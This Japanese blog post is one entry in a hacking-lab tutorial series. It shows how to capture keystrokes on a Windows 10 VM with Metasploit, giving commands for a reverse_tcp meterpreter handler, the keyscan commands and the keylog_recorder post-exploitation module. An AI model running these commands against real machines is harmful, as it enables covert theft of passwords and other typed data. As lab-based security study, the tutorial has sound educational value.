0
1

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?

More than 1 year has passed since last update.

Kali Linux2022.1 でハッキングラボをつくってみる 6 Windows10をハッキングする9 キーロガーを利用する

Last updated at Posted at 2022-05-03

はじめに

今回は、Metasploitの簡易的なキーロガーを利用する。
キーロガーの悪用によって、パスワードを奪取することが可能になる。
この記事は、「ハッキング・ラボのつくりかた」(IPUSIRON著)のP.359-363を参考にしている。

注意事項
記事で紹介されている行為を他人や団体、インフラなどの許可を得ずに行った場合、犯罪となる可能性が有ります。
あくまでも、記事の内容は情報セキュリティの学習です。読者様の所有・管理の機器、システムでのみ実行してください。
また、読者さまのシステムにトラブルが起きたとしても、私は責任を負いかねます。

Meterpreterプロンプトのキーロガーコマンド

キーロギングする前に、meterpreterセッションを確立をしておく。

msf >
use multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.100
show options
exploit

セッションが確立したら、キーロガーのコマンドを実行する。

  • キーロギングを開始
meterpreter >
keyscan_start
  • キーログを表示
meterpreter >
keyscan_dump

メモ帳のテキストを削除した後、話題になっているYoutuberの名前を入力した結果
VirtualBox_kali-linux-2022.1ガーシー.png

同書には、

キーログには、英数字のキーだけではなく、ShiftやCtrl、Enterの入力も記録されます。(中略) 改行は「<CR>」、バックスペースは「<^H>」となります。バックスペースや全角入力を考慮しながらキーログを解析しなければなりません。
他、Deleteキーは「<Delete>」、半角/全角キーは「<半角/全角>」、矢印キーは「<Up><Down><Left><Right>」となる。

とある。
「?」「}」「A」のような、Shiftキーを押下しながら、他のキーを押下して入力する文字や記号のキーログは次のように表示された。
VirtualBox_kali-linux-2022.1キーログ1.png
キーログの解析には、上記のことに留意しなければならない。

  • キーロギングを停止
meterpreter >
keyscan_stop

Metasploitのkeylog_recorderモジュール

Metasploitのモジュール"post/windows/capture/keylog_recorder"を利用することでも、キーロギングが可能である。

msf >
sessions
//表示されるセッションのセッションIDを確認
use post/windows/capture/keylog_recorder
set session <session_id>
show options
run

オプションの内容を確認しておく。特に、変更する点はない。runでキーロギングを実行する。
VirtualBox_kali-linux-2022.1-virtualbox-amd64_03_05_2022_10_44_02.png
キーログは"/home/kali/.msf4/loot"のディレクトリに保存される。
キーロギングはCtrl+Cを押下して終了。

終わりに

今回で、Windows10のハッキングは終了です。
次回からは、Metasploitableを使ってLinuxサーバーへのハッキングを試していきたいと思います。

0
1
0

Register as a new user and use Qiita more conveniently

  1. You get articles that match your needs
  2. You can efficiently read back useful information
  3. You can use dark theme
What you can do with signing up
0
1

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?